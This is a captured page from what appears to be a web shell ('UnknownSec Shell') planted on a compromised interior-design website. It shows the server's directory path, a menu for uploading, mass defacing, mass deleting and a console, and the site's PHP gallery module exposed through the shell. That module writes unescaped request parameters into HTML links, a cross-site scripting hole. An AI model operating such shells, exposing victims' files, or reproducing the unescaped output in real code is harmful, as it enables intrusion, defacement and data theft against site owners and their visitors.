shell bypass 403

UnknownSec Shell

: /home/interiorvi/domains/interiorvisions.co.th/public_html/2/source/ [ drwxr-xr-x ]
upload mass deface mass delete console info server

name : viewgallery.mod.php
<?php

if (!defined('SITE'))
    exit('Access Denied');
$id = $base['get']['project'];
$result = $conn->nativeQuerySelect("SELECT * FROM `ext_interior_gallery` WHERE slide_id = ? AND status = 1 ORDER BY slide_order", array($id));
$row = $result[0];
$arr = splitformatToarrayData($row['slide_gallery'], true);
//echo count($arr);
foreach ($arr as $key => $val) {
    if (trim($val) != "") {
        $data .= '<div style="text-align:center;"><img src="timthumb.php?src=' . $val . '&h=540"/></div>';
    }
}
//
if ($base['cookie']['projectId'] != "") {
    //echo $base['cookie']['projectId'];
    $allId = splitformatToarrayData($base['cookie']['projectId']);
    $key = array_search($id, $allId);
    if (($key + 1) < count($allId)) {
        $nextProjectId = $allId[$key + 1];
    } else {
        $nextProjectId = 0;
    }
    if ($key - 1 >= 0) {
        $backProjectId = $allId[$key - 1];
    } else {
        $backProjectId = 0;
    }
}
if ($backProjectId == 0) {
    $base['data']['backProject'] = '';
} else {
    $base['data']['backProject'] = '<a href="index.php?mod=viewgallery&cname=' . $base['get']['cname'] . '&sname=' . $base['get']['sname'] . '&project=' . $backProjectId . '"><img src="images/previous-project.png" alt="back project"/></a>';
}
if ($nextProjectId == 0) {
    $base['data']['nextProject'] = '<img src="images/no-project.png" alt="end project"/>';
} else {
    $base['data']['nextProject'] = '<a href="index.php?mod=viewgallery&cname=' . $base['get']['cname'] . '&sname=' . $base['get']['sname'] . '&project=' . $nextProjectId . '"><img src="images/next-project.png" alt="next project"/></a>';
}
//
if ($data == "") {
    $data .= '<div style="text-align:center;"><img src="images/Not available.jpg"/></div>';
}
$base['data']['content'] = $data;
$base['data']['pagenavigatator'] = $base['lang'][$base['get']['nav']];
//$temp = splitformatToarrayData(getProjectName($row['slide_cover_detail']));
$detail = splitformatToarrayData(getProjectDetail($row['slide_cover_detail']), true);


$base['data']['catagHeadLink'] = '<a href="index.php?mod=view' . strtolower($base['get']['cname']) . 'project&catag=' . $base['get']['catag'] . '&cname=' . $base['get']['cname'] . '&sname=' . $base['get']['sname'] . '">' . $base['get']['sname'] . '</a>';
$base['data']['projectname'] = $detail[0];
$base['data']['area'] = $detail[1];
$base['data']['location'] = $detail[2];
$base['data']['owner'] = $detail[3];
$base['data']['year'] = $detail[4];
//add new data 
$base['data']['information'] = $detail[5];
$base['data']['conceptdesign'] = $detail[6];
$cover = splitformatToarrayData($row['slide_cover'], true);
$getYoutubeCode = split("v=", $cover[0]);
//http://www.youtube.com/watch?v=n1NH_NDosNA
//http://www.youtube.com/v/e5o9kVmvPH4
$base['data']['youtube'] = $getYoutubeCode[1];
$base['data']['youtubedesc'] = $cover[1];//en
//$base['data']['youtubedesc'] = $cover[2];//th
//
template('viewgallery');
?>

© 2024 UnknownSec